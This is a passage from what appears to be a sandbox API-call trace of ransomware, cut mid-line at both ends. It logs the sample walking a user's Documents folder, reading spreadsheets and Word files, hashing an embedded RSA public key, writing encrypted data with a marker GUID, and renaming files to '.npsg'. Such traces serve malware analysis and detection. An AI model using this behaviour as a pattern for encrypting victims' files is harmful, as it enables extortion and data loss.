lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400368 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95788 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.747] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xbad8, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xbad8, lpOverlapped=0x0) returned 1 [0236.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.748] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xbadd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.748] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.748] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.748] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.748] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.749] CloseHandle (hObject=0x644) returned 1 [0236.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0236.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0236.751] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lF1b2YUr4l3y9B7QFUi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lf1b2yur4l3y9b7qfui.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lF1b2YUr4l3y9B7QFUi.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lf1b2yur4l3y9b7qfui.xlsx.npsg")) returned 1 [0236.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.753] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.757] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x33b8188 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c968 [0236.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0236.757] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0236.757] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0236.757] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0236.757] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f6a030, ftCreationTime.dwHighDateTime=0x1d54057, ftLastAccessTime.dwLowDateTime=0x53f84ed0, ftLastAccessTime.dwHighDateTime=0x1d5b972, ftLastWriteTime.dwLowDateTime=0x53f84ed0, ftLastWriteTime.dwHighDateTime=0x1d5b972, nFileSizeHigh=0x0, nFileSizeLow=0x13b4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nhehYsbhj.xlsx", cAlternateFileName="NHEHYS~1.XLS")) returned 1 [0236.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nhehYsbhj.xlsx") returned=".xlsx" [0236.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nhehYsbhj.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhehysbhj.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.758] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=80718) returned 1 [0236.758] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.760] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13b28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.760] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.762] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x13b4e, lpOverlapped=0x0) returned 1 [0236.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.763] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.764] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.764] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.764] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.764] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.764] GetLastError () returned 0x0 [0236.764] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.764] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.764] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.764] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.764] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.765] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.765] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13b4e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.766] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.766] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.766] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.766] CloseHandle (hObject=0x644) returned 1 [0236.767] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nhehYsbhj.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhehysbhj.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nhehYsbhj.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhehysbhj.xlsx.npsg")) returned 1 [0236.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.768] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0236.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0236.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0236.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c990, ftCreationTime.dwHighDateTime=0x1d56ffa, ftLastAccessTime.dwLowDateTime=0x73dc1e80, ftLastAccessTime.dwHighDateTime=0x1d56f75, ftLastWriteTime.dwLowDateTime=0x73dc1e80, ftLastWriteTime.dwHighDateTime=0x1d56f75, nFileSizeHigh=0x0, nFileSizeLow=0x29d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PFoVTxzbqocze_Y6chw.docx", cAlternateFileName="PFOVTX~1.DOC")) returned 1 [0236.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0236.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PFoVTxzbqocze_Y6chw.docx") returned=".docx" [0236.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PFoVTxzbqocze_Y6chw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pfovtxzbqocze_y6chw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.772] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=10710) returned 1 [0236.772] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.775] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x29b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.775] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.776] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.776] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x29d6, lpOverlapped=0x0) returned 1 [0236.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.777] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.778] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.778] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.778] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.778] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.778] GetLastError () returned 0x0 [0236.778] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.778] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: 